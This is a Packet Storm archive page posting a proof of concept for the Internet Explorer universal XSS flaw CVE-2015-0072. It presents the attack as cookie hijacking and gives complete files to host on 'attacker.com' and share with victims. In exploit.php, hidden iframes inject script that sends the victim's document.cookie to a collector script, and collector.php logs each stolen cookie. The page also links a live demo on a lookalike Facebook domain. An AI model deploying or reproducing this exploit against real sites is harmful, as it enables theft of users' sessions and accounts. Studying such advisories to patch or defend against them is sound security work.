what you don't know can hurt you

Microsoft Internet Explorer Universal XSS Proof Of Concept

Microsoft Internet Explorer Universal XSS Proof Of Concept
Posted Feb 9, 2015
Authored by bhdresh

Proof of concept demonstration code for the universal cross site scripting vulnerability that affects Microsoft Internet Explorer as defined in CVE-2015-0072.

tags | exploit, xss, proof of concept
advisories | CVE-2015-0072
MD5 | 099fe37d9fc81b2fd829178163bc7ae3

Microsoft Internet Explorer Universal XSS Proof Of Concept

Change Mirror Download
Cookie hijacking: Internet Explorer UXSS (CVE-2015-0072)

Host below files on webserver (attacker.com) and share the exploit link with victims,

exploit.php --- exploit link (Share with victim)

redirect.php --- Script to redirect on target page (target page should not contain X-Frame-Options or it will fail)

delay.php --- Script to add delay

collector.php --- Script to collect hijacked cookie

log.txt --- Collected cookies will be stored in this text file

-------------------------------------exploit.php-----------------------------------
<iframe src="redirect.php" style="display:none"></iframe>
<iframe src="https://target.com/" style="display:none"></iframe>
<script>
top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","http://attacker.com/delay.php",false),send();_.location="javascript:bkp=\'http://attacker.com/collector.php?\'+document.cookie;alert(bkp);window.location(bkp);"');
</script>
--------------------------------------------------------------------------------------

-------------------------------------redirect.php-----------------------------------
<?php
header("Location: https://target.com/");
exit();
?>
--------------------------------------------------------------------------------------

-------------------------------------delay.php-----------------------------------
<?php
sleep(15);
echo 'Bhdresh';
exit();
?>
--------------------------------------------------------------------------------------

-------------------------------------collector.php-----------------------------------
<?php
$f = fopen("log.txt", 'a');
fwrite($f, $_SERVER["REQUEST_URI"]."\n");
fclose($f);
header("Location: http://www.youtube.com/");
?>

--------------------------------------------------------------------------------------

-------------------------------------log.txt-----------------------------------
- Create a file as log.txt and modify the permissions (chmod 777 log.txt)
--------------------------------------------------------------------------------------
Demo: facabook.net16.net/exploit.php
Reference: http://innerht.ml/blog/ie-uxss.html

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    6 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close